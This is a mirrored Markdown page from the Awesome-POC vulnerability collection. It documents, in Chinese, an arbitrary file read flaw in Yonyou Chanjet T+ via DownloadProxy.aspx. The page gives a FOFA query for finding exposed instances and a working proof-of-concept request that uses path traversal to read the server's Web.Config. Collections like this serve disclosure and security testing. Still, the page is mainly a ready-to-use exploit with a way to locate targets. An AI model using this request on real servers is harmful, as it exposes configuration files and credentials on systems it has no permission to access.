admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞.md

33 lines
640 B
Markdown
Raw Normal View History

更新漏洞库:Web应用漏洞/
2022-09-09 10:51:42 +08:00
# 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
## 漏洞描述
用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞攻击者通过漏洞可以获取服务器上的敏感文件
## 漏洞影响
```
用友 畅捷通T+
```
## FOFA
```
app="畅捷通-TPlus"
```
## 漏洞复现
登录页面
![image-20220909104559292](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209091045361.png)
验证POC
```
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
```
![image-20220909104628456](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209091046535.png)
Reference in New Issue Copy Permalink